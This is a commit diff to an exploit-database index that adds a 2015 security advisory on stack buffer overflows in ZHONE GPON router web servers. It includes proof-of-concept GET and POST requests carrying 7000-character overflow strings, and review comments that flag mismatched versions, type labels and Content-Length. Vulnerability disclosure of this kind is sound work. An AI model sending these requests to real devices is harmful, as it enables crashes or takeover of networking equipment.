DB: 2015-10-17
1 new exploits
parent aa57287847
commit ecfbb07d92
2 changed files with 81 additions and 0 deletions
|
@ -34735,6 +34735,7 @@ id,file,description,date,author,platform,type,port
|
|||
38454,platforms/multiple/remote/38454.py,"Linux/MIPS Kernel NetUSB - Remote Code Execution Exploit",2015-10-14,blasty,multiple,remote,0
|
||||
38455,platforms/hardware/webapps/38455.txt,"ZyXEL PMG5318-B20A - OS Command Injection Vulnerability",2015-10-14,"Karn Ganeshen",hardware,webapps,0
|
||||
38456,platforms/windows/local/38456.py,"Boxoft WAV to MP3 Converter 1.1 - SEH Buffer Overflow",2015-10-14,ArminCyber,windows,local,0
|
||||
38475,platforms/hardware/dos/38475.txt,"ZHONE < S3.0.501 - Multiple Remote Code Execution Vulnerabilities",2015-10-16,"Lyon Yang",hardware,dos,0
|
||||
38458,platforms/php/webapps/38458.txt,"WordPress Spider Video Player Plugin 'theme' Parameter SQL Injection Vulnerability",2013-04-11,"Ashiyane Digital Security Team",php,webapps,0
|
||||
38459,platforms/php/webapps/38459.txt,"Request Tracker 'ShowPending' Parameter SQL Injection Vulnerability",2013-04-11,cheki,php,webapps,0
|
||||
38452,platforms/windows/local/38452.txt,"CDex Genre 1.79 - Stack Buffer Overflow",2015-10-13,Un_N0n,windows,local,0
|
||||
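Review bot: the 38475 row is filed under platforms/hardware/dos/ with type dos, while its description reads "Multiple Remote Code Execution Vulnerabilities", so the index entry contradicts itself and anyone filtering by type gets the wrong picture of its impact. Either reword the description to match what the file actually contains (a stack overflow triggered by an oversized request) or file the entry under the remote category, so that path, type and title agree.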
80
platforms/hardware/dos/38475.txt
Executable file
|
@ -0,0 +1,80 @@
|
|||
Vantage Point Security Advisory 2015-003
|
||||
========================================
|
||||
|
||||
Title: Multiple Remote Code Execution found in ZHONE
|
||||
Vendor: Zhone
|
||||
Vendor URL: http://www.zhone.com
|
||||
Device Model: ZHONE ZNID GPON 2426A
|
||||
(24xx, 24xxA, 42xx, 42xxA, 26xx, and 28xx series models)
|
||||
Versions affected: < S3.0.501
|
||||
Severity: High
|
||||
Vendor notified: Yes
|
||||
Reported:
|
||||
Public release:
|
||||
Author: Lyon Yang <lyon[at]vantagepoint[dot]sg> <lyon.yang.s[at]gmail[dot]com>
|
||||
|
||||
Summary:
|
||||
--------
|
||||
|
||||
ZHONE RGW is vulnerable to stack-based buffer overflow attacks due to
|
||||
the use of unsafe string functions without sufficient input validation
|
||||
in the httpd binary. Two exploitable conditions were discovered when
|
||||
requesting a large (7000) character filename ending in .cgi, .tst,
|
||||
.html, .cmd, .conf, .txt and .wl, in GET or POST requests. Vantage
|
||||
Point has developed working code execution exploits for these issues.
|
||||
|
||||
|
||||
1. Stack Overflow via HTTP GET Request
|
||||
---------------------------------------------------------------------------------------
|
||||
|
||||
GET /.cmd?AAAA…..AAAA<7000 Characters> HTTP/1.1
|
||||
Host: 192.168.1.1
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0)
|
||||
Gecko/20100101 Firefox/35.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.1.1/zhnvlanadd.html
|
||||
Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>)
|
||||
Connection: keep-alive
|
||||
|
||||
2. Stack Overflow via HTTP POST Request
|
||||
---------------------------------------------------------------------------------------
|
||||
|
||||
POST /.cgi HTTP/1.1
|
||||
Host: 192.168.1.1
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.1.1/updatesettings.html
|
||||
Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>)
|
||||
Content-Length: 88438
|
||||
|
||||
AAAA…..AAAA<7000 Characters>
|
||||
|
||||
|
||||
Fix Information:
|
||||
----------------
|
||||
|
||||
Upgrade to version S3.1.241
|
||||
|
||||
|
||||
Timeline:
|
||||
---------
|
||||
2015/04: Issues reported to Zhone
|
||||
2015/06: Requested Update
|
||||
2015/08: Requested Update
|
||||
2015/09: Requested Update
|
||||
2015/10: Confirm that all issues has been fixed
|
||||
|
||||
|
||||
About Vantage Point Security:
|
||||
--------------------
|
||||
|
||||
Vantage Point is the leading provider for penetration testing and
|
||||
security advisory services in Singapore. Clients in the Financial,
|
||||
Banking and Telecommunications industries select Vantage Point
|
||||
Security based on technical competency and a proven track record to
|
||||
deliver significant and measurable improvements in their security
|
||||
posture.
|
||||
|
||||
https://www.vantagepoint.sg/
|
||||
office[at]vantagepoint[dot]sg
|
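Review bot: "Versions affected: < S3.0.501" in the header does not line up with "Upgrade to version S3.1.241" under Fix Information, so a reader cannot tell whether builds from S3.0.501 up to S3.1.241 are affected; state the first fixed version once and use it in both places. The "Reported:" and "Public release:" fields are left empty although the Timeline gives 2015/04 and 2015/10, and in the POST example "Content-Length: 88438" does not match the 7000-character body the text describes. The file is also added as an executable file, which a plain-text advisory does not need.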